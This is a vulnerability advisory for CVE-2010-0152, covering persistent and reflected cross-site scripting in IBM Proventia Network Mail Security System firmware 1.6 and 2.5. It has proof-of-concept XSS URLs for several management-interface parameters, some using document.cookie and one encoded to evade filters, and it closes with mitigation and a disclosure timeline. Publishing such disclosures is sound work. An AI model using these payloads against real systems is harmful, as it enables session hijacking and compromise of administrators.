CVE: |
|
CVE-2010-0152 |
|
| Vendor: |
|
IBM |
|
| Products: |
|
Proventia
Network Mail Security System
|
|
| Vulnerabilities: |
|
Multiple Cross-Site
Scripting (XSS)
|
|
| Risk: |
|
High |
|
| Attack
Vector: |
|
From
Remote |
|
Authentication:
Reference:
|
|
Not Required/Required
N/A
|
|
|
|
|
|
Description
Web-based
Local Management Interface of IBM
Proventia Network Mail Security System appliance (firmware 1.6 and 2.5)
is
vulnerable to multiple persistent and reflected XSS attacks. When
exploited by an external/internal attacker, such identified
vulnerabilities could lead to Session
Hijack,
Information Disclosure, force installation of malicious file or
Trojan on users' PCs, etc.
A
persistent XSS
vulnerability can be exploited by an external unauthenticated attacker
to inject
malicious scripting code which is persistently stored. When the
system is
accessed by authorised users, such malicious code could be used to
severely
compromise the security of the
appliance.
A persistent XSS vulnerability identified in
saved search filters
(Mail Security->Email Browser) allows an internal
authenticated attacker to inject
malicious scripting code.
Multiple
reflected XSS vulnerabilities can be
exploited by manipulating parameters of pvm_messagestore.php resource.
|
| |
url_placeholder/pvm_messagestore.php?msgid=&sender=&rcpt=&subject=&meta=&mailsize=&folder=allfolders&date1=<script>alert('xss')</script>&date2=&s=mails&favname= |
|
Reflected
XSS vulnerabilities can be exploited by
manipulating parameters of the following resources:
- userfilter
parameter of pvm_user_management.php resource.
|
| |
url_placeholder/pvm_user_management.php?userfilter=1%22+onblur%3D%22alert%28%27xss%27%29 |
|
- ping parameter
of sys_tools.php
|
| |
url_placeholder/sys_tools.php?form=ping&page=sys_ping.php&ping=<script>alert(document.cookie)</script> |
|
| |
- action
parameter of pvm_cert_commaction.php resource
|
| |
url_placeholder/pvm_cert_commaction.php?ajax=1&action=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)> |
|
- action
parameter of pvm_cert_serveraction.php resource.
|
| |
url_placeholder/pvm_cert_serveraction.php
?ajax=1&action=>"'><script>alert(document.cookie)</script> |
|
- action
parameter of pvm_smtpstore.php resource.
|
| |
url_placeholder/pvm_smtpstore.php?id=frozen&action="><script>alert("XSS")</script> |
|
- l
parameter of
/sla/index.php resource
|
| |
url_placeholder/sla/index.php?l="><script>alert(document.cookie)</script> |
|
Affected Versions
IBM Proventia
Network Mail Security System - virtual appliance (firmware 1.6)
IBM Proventia
Network Mail Security System - virtual appliance (firmware 2.5)
Mitigation
Vendor recommends upgrading
to PNMSS firmware 2.5.0.2 or
later.
Alternatively,
please contact IBM for
technical support.
Disclosure Timeline
2009,
November 07: Vulnerabilities discovered and documented
2009,
November 08: Notification sent to IBM
2009,
November 09: IBM acknowledges receiving the report
2010, March: IBM releases PNMSS Firmware 2.5.0.2 correcting the reported issues
2010, September 12: MVSA-10-007 advisory published.
MVSA-10-007
Dr.
Marian
Ventuneac
|
|